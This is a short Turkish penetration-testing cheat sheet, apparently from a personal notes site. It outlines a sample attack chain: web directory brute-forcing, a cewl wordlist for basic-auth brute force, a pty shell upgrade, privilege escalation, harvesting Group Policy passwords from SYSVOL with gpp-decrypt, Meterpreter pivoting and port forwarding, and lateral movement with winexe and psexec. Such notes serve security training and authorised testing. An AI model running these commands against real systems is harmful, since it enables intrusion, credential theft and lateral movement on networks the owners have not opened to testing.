Örnek Bir Senaryo
Hedef web uygulamasına
dirbuster
başlat. (wordlist: /usr/share/dirbuster/wordlist/directory-list-1.0.txt)HTTP basic auth mekanizmasına brute-force saldırısı yap. Bu işlem için cewl aracını kullan.
cewl domain.com -m 6 -w /root/file.txt 2 > /dev/null
hash-identifier aracını kullanılan hash algoritmasını öğrenmek için kullanılabilir.
Kullanılan web uygulamasına ait exploit googledan araştırılır.
python -c 'import pty; pty.spawn("/bin/bash")'
EXPORT TERM=linux
OS info;
cat /etc/issue
Priv. esc. için googledan exploit aratılır. (
gimmeroot.c
)Root olduktan sonra
.htaccess
dosyasından izin verilen ip adresleri öğrenilir.post/windows/gather/enum_domain domain adı ve DC adına ait bilgileri getirir. Aşağıdaki komut DC'de bulunan grup policy dosyasını bulmak için kullanılır. Grup policy dosyasında kullanıcıya ait parola bilgisi yer alabilir. net use z: \MACHINE_IP\SYSVOL
Grup policy dosyasında bulunan parola
gpp-decrypt
aracı kullanılarak kırılabilir.Meterpreter oturumu elde edilen makine üzerinde meterpreter backgrounda alındıktan sonra aşağıdaki komut yardımıyla route kuralı tanımlanır.
msf > route add TARGET SUBNET METERPRETER_SESSION
Meterpreter oturumu elde edilen makinenin 445 portuna gelen trafiği "X.X.X.X" ip adresinin 445 portuna yönlendir.
meterpreter > portfwd add -l 445 -p 445 -r X.X.X.X
# winexe -U Administrator%Password //IP "cmd"
# psexec.py ./eviluser:Password@IP cmd
Last modified 3yr ago